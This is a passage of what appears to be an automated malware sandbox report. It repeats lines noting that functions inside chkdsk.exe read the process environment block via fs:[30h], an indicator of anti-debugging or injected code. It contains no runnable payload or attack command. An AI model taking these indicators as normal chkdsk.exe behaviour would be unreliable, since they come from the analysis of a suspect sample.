      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F75B mov eax, dword ptr fs:[00000030h]22_2_0584F75B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F75B mov eax, dword ptr fs:[00000030h]22_2_0584F75B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F75B mov eax, dword ptr fs:[00000030h]22_2_0584F75B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F75B mov eax, dword ptr fs:[00000030h]22_2_0584F75B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F75B mov eax, dword ptr fs:[00000030h]22_2_0584F75B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F75B mov eax, dword ptr fs:[00000030h]22_2_0584F75B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F75B mov eax, dword ptr fs:[00000030h]22_2_0584F75B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F75B mov eax, dword ptr fs:[00000030h]22_2_0584F75B
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FE750 mov eax, dword ptr fs:[00000030h]22_2_058FE750
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05862760 mov ecx, dword ptr fs:[00000030h]22_2_05862760
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05891763 mov eax, dword ptr fs:[00000030h]22_2_05891763
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05891763 mov eax, dword ptr fs:[00000030h]22_2_05891763
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05891763 mov eax, dword ptr fs:[00000030h]22_2_05891763
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05891763 mov eax, dword ptr fs:[00000030h]22_2_05891763
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05891763 mov eax, dword ptr fs:[00000030h]22_2_05891763
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05891763 mov eax, dword ptr fs:[00000030h]22_2_05891763
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05854779 mov eax, dword ptr fs:[00000030h]22_2_05854779
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05854779 mov eax, dword ptr fs:[00000030h]22_2_05854779
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05880774 mov eax, dword ptr fs:[00000030h]22_2_05880774
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860680 mov eax, dword ptr fs:[00000030h]22_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860680 mov eax, dword ptr fs:[00000030h]22_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860680 mov eax, dword ptr fs:[00000030h]22_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860680 mov eax, dword ptr fs:[00000030h]22_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860680 mov eax, dword ptr fs:[00000030h]22_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860680 mov eax, dword ptr fs:[00000030h]22_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860680 mov eax, dword ptr fs:[00000030h]22_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860680 mov eax, dword ptr fs:[00000030h]22_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860680 mov eax, dword ptr fs:[00000030h]22_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860680 mov eax, dword ptr fs:[00000030h]22_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860680 mov eax, dword ptr fs:[00000030h]22_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05860680 mov eax, dword ptr fs:[00000030h]22_2_05860680
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CD69D mov eax, dword ptr fs:[00000030h]22_2_058CD69D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05858690 mov eax, dword ptr fs:[00000030h]22_2_05858690
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590F68C mov eax, dword ptr fs:[00000030h]22_2_0590F68C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DC691 mov eax, dword ptr fs:[00000030h]22_2_058DC691
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_059186A8 mov eax, dword ptr fs:[00000030h]22_2_059186A8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_059186A8 mov eax, dword ptr fs:[00000030h]22_2_059186A8
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058506CF mov eax, dword ptr fs:[00000030h]22_2_058506CF
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058F86C2 mov eax, dword ptr fs:[00000030h]22_2_058F86C2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0591A6C0 mov eax, dword ptr fs:[00000030h]22_2_0591A6C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587D6D0 mov eax, dword ptr fs:[00000030h]22_2_0587D6D0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058496E0 mov eax, dword ptr fs:[00000030h]22_2_058496E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058496E0 mov eax, dword ptr fs:[00000030h]22_2_058496E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585C6E0 mov eax, dword ptr fs:[00000030h]22_2_0585C6E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058556E0 mov eax, dword ptr fs:[00000030h]22_2_058556E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058556E0 mov eax, dword ptr fs:[00000030h]22_2_058556E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058556E0 mov eax, dword ptr fs:[00000030h]22_2_058556E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058766E0 mov eax, dword ptr fs:[00000030h]22_2_058766E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058766E0 mov eax, dword ptr fs:[00000030h]22_2_058766E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CC6F2 mov eax, dword ptr fs:[00000030h]22_2_058CC6F2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058CC6F2 mov eax, dword ptr fs:[00000030h]22_2_058CC6F2
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058E3608 mov eax, dword ptr fs:[00000030h]22_2_058E3608
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058E3608 mov eax, dword ptr fs:[00000030h]22_2_058E3608
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058E3608 mov eax, dword ptr fs:[00000030h]22_2_058E3608
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058E3608 mov eax, dword ptr fs:[00000030h]22_2_058E3608
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058E3608 mov eax, dword ptr fs:[00000030h]22_2_058E3608
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058E3608 mov eax, dword ptr fs:[00000030h]22_2_058E3608
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587D600 mov eax, dword ptr fs:[00000030h]22_2_0587D600
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587D600 mov eax, dword ptr fs:[00000030h]22_2_0587D600
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588360F mov eax, dword ptr fs:[00000030h]22_2_0588360F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05924600 mov eax, dword ptr fs:[00000030h]22_2_05924600
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590F607 mov eax, dword ptr fs:[00000030h]22_2_0590F607
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FD62C mov ecx, dword ptr fs:[00000030h]22_2_058FD62C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FD62C mov ecx, dword ptr fs:[00000030h]22_2_058FD62C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FD62C mov eax, dword ptr fs:[00000030h]22_2_058FD62C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05857623 mov eax, dword ptr fs:[00000030h]22_2_05857623
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05855622 mov eax, dword ptr fs:[00000030h]22_2_05855622
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05855622 mov eax, dword ptr fs:[00000030h]22_2_05855622
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588C620 mov eax, dword ptr fs:[00000030h]22_2_0588C620
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05850630 mov eax, dword ptr fs:[00000030h]22_2_05850630
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588F63F mov eax, dword ptr fs:[00000030h]22_2_0588F63F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588F63F mov eax, dword ptr fs:[00000030h]22_2_0588F63F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05880630 mov eax, dword ptr fs:[00000030h]22_2_05880630
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D8633 mov esi, dword ptr fs:[00000030h]22_2_058D8633
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D8633 mov eax, dword ptr fs:[00000030h]22_2_058D8633
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D8633 mov eax, dword ptr fs:[00000030h]22_2_058D8633
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05853640 mov eax, dword ptr fs:[00000030h]22_2_05853640
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586F640 mov eax, dword ptr fs:[00000030h]22_2_0586F640
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586F640 mov eax, dword ptr fs:[00000030h]22_2_0586F640
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0586F640 mov eax, dword ptr fs:[00000030h]22_2_0586F640
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588C640 mov eax, dword ptr fs:[00000030h]22_2_0588C640
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588C640 mov eax, dword ptr fs:[00000030h]22_2_0588C640
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584D64A mov eax, dword ptr fs:[00000030h]22_2_0584D64A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584D64A mov eax, dword ptr fs:[00000030h]22_2_0584D64A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588265C mov eax, dword ptr fs:[00000030h]22_2_0588265C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588265C mov ecx, dword ptr fs:[00000030h]22_2_0588265C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588265C mov eax, dword ptr fs:[00000030h]22_2_0588265C
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05885654 mov eax, dword ptr fs:[00000030h]22_2_05885654
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585965A mov eax, dword ptr fs:[00000030h]22_2_0585965A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585965A mov eax, dword ptr fs:[00000030h]22_2_0585965A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D166E mov eax, dword ptr fs:[00000030h]22_2_058D166E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D166E mov eax, dword ptr fs:[00000030h]22_2_058D166E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058D166E mov eax, dword ptr fs:[00000030h]22_2_058D166E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588666D mov esi, dword ptr fs:[00000030h]22_2_0588666D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588666D mov eax, dword ptr fs:[00000030h]22_2_0588666D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588666D mov eax, dword ptr fs:[00000030h]22_2_0588666D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05863660 mov eax, dword ptr fs:[00000030h]22_2_05863660
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05863660 mov eax, dword ptr fs:[00000030h]22_2_05863660
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05863660 mov eax, dword ptr fs:[00000030h]22_2_05863660
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05847662 mov eax, dword ptr fs:[00000030h]22_2_05847662
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05847662 mov eax, dword ptr fs:[00000030h]22_2_05847662
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05847662 mov eax, dword ptr fs:[00000030h]22_2_05847662
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05850670 mov eax, dword ptr fs:[00000030h]22_2_05850670
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892670 mov eax, dword ptr fs:[00000030h]22_2_05892670
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05892670 mov eax, dword ptr fs:[00000030h]22_2_05892670
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05854180 mov eax, dword ptr fs:[00000030h]22_2_05854180
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05854180 mov eax, dword ptr fs:[00000030h]22_2_05854180
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05854180 mov eax, dword ptr fs:[00000030h]22_2_05854180
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05879194 mov eax, dword ptr fs:[00000030h]22_2_05879194
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05891190 mov eax, dword ptr fs:[00000030h]22_2_05891190
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05891190 mov eax, dword ptr fs:[00000030h]22_2_05891190
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_059251B6 mov eax, dword ptr fs:[00000030h]22_2_059251B6
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588E1A4 mov eax, dword ptr fs:[00000030h]22_2_0588E1A4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588E1A4 mov eax, dword ptr fs:[00000030h]22_2_0588E1A4
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058841BB mov ecx, dword ptr fs:[00000030h]22_2_058841BB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058841BB mov eax, dword ptr fs:[00000030h]22_2_058841BB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058841BB mov eax, dword ptr fs:[00000030h]22_2_058841BB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058831BE mov eax, dword ptr fs:[00000030h]22_2_058831BE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058831BE mov eax, dword ptr fs:[00000030h]22_2_058831BE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058601C0 mov eax, dword ptr fs:[00000030h]22_2_058601C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058601C0 mov eax, dword ptr fs:[00000030h]22_2_058601C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058651C0 mov eax, dword ptr fs:[00000030h]22_2_058651C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058651C0 mov eax, dword ptr fs:[00000030h]22_2_058651C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058651C0 mov eax, dword ptr fs:[00000030h]22_2_058651C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058651C0 mov eax, dword ptr fs:[00000030h]22_2_058651C0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058591E5 mov eax, dword ptr fs:[00000030h]22_2_058591E5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058591E5 mov eax, dword ptr fs:[00000030h]22_2_058591E5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585A1E3 mov eax, dword ptr fs:[00000030h]22_2_0585A1E3
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585A1E3 mov eax, dword ptr fs:[00000030h]22_2_0585A1E3
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585A1E3 mov eax, dword ptr fs:[00000030h]22_2_0585A1E3
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585A1E3 mov eax, dword ptr fs:[00000030h]22_2_0585A1E3
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585A1E3 mov eax, dword ptr fs:[00000030h]22_2_0585A1E3
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587B1E0 mov eax, dword ptr fs:[00000030h]22_2_0587B1E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587B1E0 mov eax, dword ptr fs:[00000030h]22_2_0587B1E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587B1E0 mov eax, dword ptr fs:[00000030h]22_2_0587B1E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587B1E0 mov eax, dword ptr fs:[00000030h]22_2_0587B1E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587B1E0 mov eax, dword ptr fs:[00000030h]22_2_0587B1E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587B1E0 mov eax, dword ptr fs:[00000030h]22_2_0587B1E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587B1E0 mov eax, dword ptr fs:[00000030h]22_2_0587B1E0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058481EB mov eax, dword ptr fs:[00000030h]22_2_058481EB
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058491F0 mov eax, dword ptr fs:[00000030h]22_2_058491F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058491F0 mov eax, dword ptr fs:[00000030h]22_2_058491F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058601F1 mov eax, dword ptr fs:[00000030h]22_2_058601F1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058601F1 mov eax, dword ptr fs:[00000030h]22_2_058601F1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058601F1 mov eax, dword ptr fs:[00000030h]22_2_058601F1
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587F1F0 mov eax, dword ptr fs:[00000030h]22_2_0587F1F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587F1F0 mov eax, dword ptr fs:[00000030h]22_2_0587F1F0
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_059181EE mov eax, dword ptr fs:[00000030h]22_2_059181EE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_059181EE mov eax, dword ptr fs:[00000030h]22_2_059181EE
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0587510F mov eax, dword ptr fs:[00000030h]22_2_0587510F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0585510D mov eax, dword ptr fs:[00000030h]22_2_0585510D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05880118 mov eax, dword ptr fs:[00000030h]22_2_05880118
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584F113 mov eax, dword ptr fs:[00000030h]22_2_0584F113
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05887128 mov eax, dword ptr fs:[00000030h]22_2_05887128
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05887128 mov eax, dword ptr fs:[00000030h]22_2_05887128
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0590F13E mov eax, dword ptr fs:[00000030h]22_2_0590F13E
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058DA130 mov eax, dword ptr fs:[00000030h]22_2_058DA130
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584A147 mov eax, dword ptr fs:[00000030h]22_2_0584A147
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584A147 mov eax, dword ptr fs:[00000030h]22_2_0584A147
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584A147 mov eax, dword ptr fs:[00000030h]22_2_0584A147
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058E314A mov eax, dword ptr fs:[00000030h]22_2_058E314A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058E314A mov eax, dword ptr fs:[00000030h]22_2_058E314A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058E314A mov eax, dword ptr fs:[00000030h]22_2_058E314A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058E314A mov eax, dword ptr fs:[00000030h]22_2_058E314A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05923157 mov eax, dword ptr fs:[00000030h]22_2_05923157
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05923157 mov eax, dword ptr fs:[00000030h]22_2_05923157
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05923157 mov eax, dword ptr fs:[00000030h]22_2_05923157
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588415F mov eax, dword ptr fs:[00000030h]22_2_0588415F
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05925149 mov eax, dword ptr fs:[00000030h]22_2_05925149
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0588716D mov eax, dword ptr fs:[00000030h]22_2_0588716D
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058A717A mov eax, dword ptr fs:[00000030h]22_2_058A717A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058A717A mov eax, dword ptr fs:[00000030h]22_2_058A717A
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05856179 mov eax, dword ptr fs:[00000030h]22_2_05856179
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05924080 mov eax, dword ptr fs:[00000030h]22_2_05924080
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05924080 mov eax, dword ptr fs:[00000030h]22_2_05924080
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05924080 mov eax, dword ptr fs:[00000030h]22_2_05924080
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05924080 mov eax, dword ptr fs:[00000030h]22_2_05924080
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05924080 mov eax, dword ptr fs:[00000030h]22_2_05924080
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05924080 mov eax, dword ptr fs:[00000030h]22_2_05924080
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_05924080 mov eax, dword ptr fs:[00000030h]22_2_05924080
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584C090 mov eax, dword ptr fs:[00000030h]22_2_0584C090
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_0584A093 mov ecx, dword ptr fs:[00000030h]22_2_0584A093
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_059250B7 mov eax, dword ptr fs:[00000030h]22_2_059250B7
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF0A5 mov eax, dword ptr fs:[00000030h]22_2_058FF0A5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF0A5 mov eax, dword ptr fs:[00000030h]22_2_058FF0A5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF0A5 mov eax, dword ptr fs:[00000030h]22_2_058FF0A5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF0A5 mov eax, dword ptr fs:[00000030h]22_2_058FF0A5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF0A5 mov eax, dword ptr fs:[00000030h]22_2_058FF0A5
      Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 22_2_058FF0A5 mov eax, dword ptr fs:[00000030h]22_2_058FF0A5
